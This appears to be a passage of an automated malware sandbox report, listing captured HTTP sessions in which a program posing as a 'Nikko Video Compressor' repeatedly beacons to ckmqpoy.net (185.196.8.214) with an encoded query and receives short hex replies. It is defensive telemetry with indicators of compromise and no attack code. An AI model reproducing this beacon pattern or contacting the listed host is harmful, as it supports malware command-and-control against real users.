                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        27192.168.2.949788185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:41.797123909 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:42.461951971 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:42 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        28192.168.2.949790185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:42.754362106 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:43.415050983 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:43 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        29192.168.2.949791185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:44.628139973 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:44.874025106 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:44 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        30192.168.2.949793185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:45.318272114 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:45.981302977 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:45 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        31192.168.2.949795185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:46.294632912 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:46.904652119 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:46 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        32192.168.2.949797185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:47.631428957 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:48.268697977 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:48 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        33192.168.2.949798185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:48.574883938 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:49.232880116 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:49 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        34192.168.2.949800185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:50.220783949 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:50.828046083 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:50 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        35192.168.2.949802185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:51.113765955 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:51.791886091 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:51 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        36192.168.2.949804185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:51.974430084 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:52.656048059 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:52 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        37192.168.2.949806185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:53.964294910 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:54.622642994 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:54 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        38192.168.2.949807185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:55.165139914 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:55.841053963 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:55 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        39192.168.2.949808185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:56.597259998 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:57.301883936 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:57 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        40192.168.2.949809185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:57.570713043 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:58.237696886 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:58 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        41192.168.2.949811185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:58.979582071 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:59.676649094 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:49:59 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        42192.168.2.949814185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:49:59.880280018 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:00.567513943 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:00 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        43192.168.2.949815185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:00.759402037 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:01.420367002 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:01 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        44192.168.2.949816185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:01.690882921 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:02.370182037 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:02 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        45192.168.2.949817185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:03.631860971 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:04.315742016 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:04 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        46192.168.2.949819185.196.8.214802036C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
